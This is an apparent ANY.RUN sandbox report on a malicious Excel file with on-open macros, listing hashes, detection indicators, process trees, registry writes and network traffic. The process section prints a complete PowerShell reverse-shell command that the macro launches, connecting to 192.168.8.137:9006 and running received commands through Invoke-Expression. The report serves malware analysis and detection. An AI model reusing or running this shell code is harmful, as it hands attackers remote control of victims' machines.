File name:

1341e6aa45333396019285ae74c9607e239139bea07ee71f9a8c8b58f18aaacd

Full analysis: https://app.any.run/tasks/b377eb29-7836-40a2-a77b-b57401477c94
Verdict: Malicious activity
Analysis date: February 21, 2025, 21:27:54
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Feb 19 09:47:44 2025, Last Saved Time/Date: Wed Feb 19 09:47:45 2025, Security: 0
MD5:

8BD2A1B87DFEA71CE57CA37A4C943B03

SHA1:

C7FBEAFF9295B2BC94965ECA03C0BE353F1C67C0

SHA256:

1341E6AA45333396019285AE74C9607E239139BEA07EE71F9A8C8B58F18AAACD

SSDEEP:

384:SycDPRYzrcqE02M+Gk2lgQ6hWWW8iUUGs+NlETh8CWGQSZtClb+tze2MHJ1SBj9Q:xzyupZtqCtzepydYxm1g

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from MS Office

      • EXCEL.EXE (PID: 3812)

    • Microsoft Office executes commands via PowerShell or Cmd

      • EXCEL.EXE (PID: 3812)

    • Starts POWERSHELL.EXE for commands execution

      • EXCEL.EXE (PID: 3812)

  • SUSPICIOUS

    • Possibly malicious use of IEX has been detected

      • EXCEL.EXE (PID: 3812)

    • Potential TCP-based PowerShell reverse shell connection

      • EXCEL.EXE (PID: 3812)

    • Base64-obfuscated command line is found

      • EXCEL.EXE (PID: 3812)

    • The process hide an interactive prompt from the user

      • EXCEL.EXE (PID: 3812)

    • Found IP address in command line

      • powershell.exe (PID: 5316)

    • Runs shell command (SCRIPT)

      • EXCEL.EXE (PID: 3812)

    • Executes script without checking the security policy

      • powershell.exe (PID: 5316)

    • The process bypasses the loading of PowerShell profile settings

      • EXCEL.EXE (PID: 3812)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: Никита
LastModifiedBy: Никита
Software: Microsoft Excel
CreateDate: 2025:02:19 09:47:44
ModifyDate: 2025:02:19 09:47:45
Security: None
CodePage: Windows Cyrillic
Company: -
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: Лист1
HeadingPairs:
  • Листы
  • 1
CompObjUserTypeLen: 27
CompObjUserType: ???? Microsoft Excel 2003
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
126
Monitored processes
3
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start excel.exe powershell.exe conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3812"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" C:\Users\admin\Desktop\1341e6aa45333396019285ae74c9607e239139bea07ee71f9a8c8b58f18aaacd.xlsC:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\excel.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
5316"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -windowstyle 1 -command "$LHOST = \"192.168.8.137\"; $LPORT = 9006; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write(\"$Output`n\"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5856\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
14 483
Read events
14 228
Write events
234
Delete events
21

Modification events

(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\3812
Operation:writeName:0
Value:
0B0E10D672FC6922968C4295C348D502295F89230046CAE28191F894E1ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511E41DD2120965007800630065006C002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel
Operation:writeName:ImmersiveWorkbookDirtySentinel
Value:
0
(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel
Operation:writeName:ExcelPreviousSessionId
Value:
{69FC72D6-9622-428C-95C3-48D502295F89}
(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:1
Value:
01D014000000001000B24E9A3E02000000000000000600000000000000
(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:de-de
Value:
2
(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:fr-fr
Value:
2
(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:es-es
Value:
2
(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:it-it
Value:
2
(PID) Process:(3812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ja-jp
Value:
2
Executable files
1
Suspicious files
11
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
3812EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\1341e6aa45333396019285ae74c9607e239139bea07ee71f9a8c8b58f18aaacd.xls.LNKbinary
MD5:3F1F708A839269DFDD563BB2F9F96A67
SHA256:9315BCBA84285181B1D2B7B58A59CCEAC1384345DC6F35A7A7FC4FCDCE2359AF
3812EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:5D56B22BF02B50ADF1C2D89E318B27FF
SHA256:269B868F7E6D0881A0EA7584C4B2D5C0AAA6B5ACCFED56A127965767984681F8
3812EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-msbinary
MD5:E4A1661C2C886EBB688DEC494532431C
SHA256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
3812EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IOSABJBYPUQUQ4L29XJG.tempbinary
MD5:4FCB2A3EE025E4A10D21E1B154873FE2
SHA256:90BF6BAA6F968A285F88620FBF91E1F5AA3E66E2BAD50FD16F37913280AD8228
3812EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Excel\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.Sbinary
MD5:FFB4D4EBDF98F968C2011304E08A8FCB
SHA256:A9944D3EA61BAF6A25FDDA476A5ED8345EBA4C53B1032ADA96A3BAA7E3035E69
3812EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\SmartLookupCache\main_ssr.htmlhtml
MD5:7D6057C7DC10F4E7FABBFB73A4C5D921
SHA256:4E4B7401905524A4B9081204B4E87C4CE422E9C7E577EC71CE1BD5A64CC37D84
3812EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\SmartLookupCache\dictionary_words_bloom_filter.databinary
MD5:A4AF96BCD3EE55F0CB99B37C806A82A5
SHA256:1BE6D822C31EDC308903E04B986F13388B216DB44019E2BCC3C060284B480BA6
5316powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_u2pezb0t.kwb.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5316powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_04itvvhi.oa1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3812EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\EE94A7D1-4AEB-4C91-ADC9-E63FEF1CDA98xml
MD5:7125C7E63DEAC7D997349A35AF6A1323
SHA256:A3D90C5CD21046E8FB4A123C4543F94422A59D1D99FBC6C1001861F190C20E83
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
26
DNS requests
11
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.161:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
HEAD
200
193.108.153.26:443
https://uci.cdn.office.net/mirrored/smartlookup/current/version.json
unknown
unknown
GET
200
52.123.128.14:443
https://ecs.office.com/config/v2/Office/excel/16.0.16026.20146/Production/CC?&Clientid=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&Application=excel&Platform=win32&Version=16.0.16026.20146&MsoVersion=16.0.16026.20002&SDX=fa000000002.2.0.1907.31003&SDX=fa000000005.1.0.1909.30011&SDX=fa000000006.1.0.1909.13002&SDX=fa000000008.1.0.1908.16006&SDX=fa000000009.1.0.1908.6002&SDX=fa000000016.1.0.1810.13001&SDX=fa000000029.1.0.1906.25001&SDX=fa000000033.1.0.1908.24001&SDX=wa104381125.1.0.1810.9001&ProcessName=excel.exe&Audience=Production&Build=ship&Architecture=x64&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&LicenseCategory=6&LicenseSKU=Professional2019Retail&OsVersion=10.0&OsBuild=19045&Channel=CC&InstallType=C2R&SessionId=%7b69FC72D6-9622-428C-95C3-48D502295F89%7d&LabMachine=false
unknown
tss
388 Kb
whitelisted
POST
200
20.189.173.24:443
https://self.events.data.microsoft.com/OneCollector/1.0/
unknown
binary
9 b
whitelisted
OPTIONS
400
193.108.153.12:443
https://uci.cdn.office.net/mirrored/smartlookup/current/
unknown
xml
297 b
whitelisted
GET
200
52.109.28.46:443
https://officeclient.microsoft.com/config16/?lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16026&crev=3
unknown
xml
179 Kb
whitelisted
GET
200
193.108.153.12:443
https://uci.cdn.office.net/mirrored/smartlookup/current/main_ssr.html
unknown
html
391 Kb
whitelisted
GET
200
193.108.153.28:443
https://uci.cdn.office.net/mirrored/smartlookup/current/scripts/microsoft.office.smartlookup.ssr.js
unknown
binary
2.50 Mb
whitelisted
GET
200
52.111.236.7:443
https://messaging.lifecycle.office.com/getcustommessage16?app=1&ui=en-US&src=BizBar&messagetype=BizBar&hwid=04111-083-043729&ver=16.0.16026&lc=en-US&platform=10%3A0%3A19045%3A2%3A0%3A0%3A256%3A1%3A&productid=%7B1717C1E0-47D3-4899-A6D3-1022DB7415E0%7D%3A00411-10830-43729-AA720%3AOffice%2019%2C%20Office19Professional2019R_Retail%20edition&clientsessionid=%7B69FC72D6-9622-428C-95C3-48D502295F89%7D&datapropertybag=%7B%22Audience%22%3A%22Production%22%2C%22AudienceGroup%22%3A%22Production%22%2C%22AudienceChannel%22%3A%22CC%22%2C%22Flight%22%3A%22ofsh6c2b1tla1a31%2Cofcrui4yvdulbf31%2Cofhpex3jznepoo31%2Cofpioygfqmufst31%2Cofaa1msspvo2xw31%22%7D
unknown
text
542 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4712
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
23.48.23.161:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4712
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3976
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3812
EXCEL.EXE
52.109.89.18:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3812
EXCEL.EXE
52.123.128.14:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
3812
EXCEL.EXE
52.111.236.7:443
messaging.lifecycle.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 20.73.194.208
whitelisted
google.com
  • 142.250.186.142
whitelisted
crl.microsoft.com
  • 23.48.23.161
  • 23.48.23.194
  • 23.48.23.140
  • 23.48.23.164
  • 23.48.23.143
  • 23.48.23.147
  • 23.48.23.150
  • 23.48.23.181
  • 23.48.23.153
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
officeclient.microsoft.com
  • 52.109.89.18
whitelisted
ecs.office.com
  • 52.123.128.14
  • 52.123.129.14
whitelisted
messaging.lifecycle.office.com
  • 52.111.236.7
whitelisted
self.events.data.microsoft.com
  • 20.189.173.24
  • 13.89.179.14
whitelisted
uci.cdn.office.net
  • 193.108.153.26
  • 193.108.153.28
  • 193.108.153.12
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
1341e6aa45333396019285ae74c9607e239139bea07ee71f9a8c8b58f18aaacd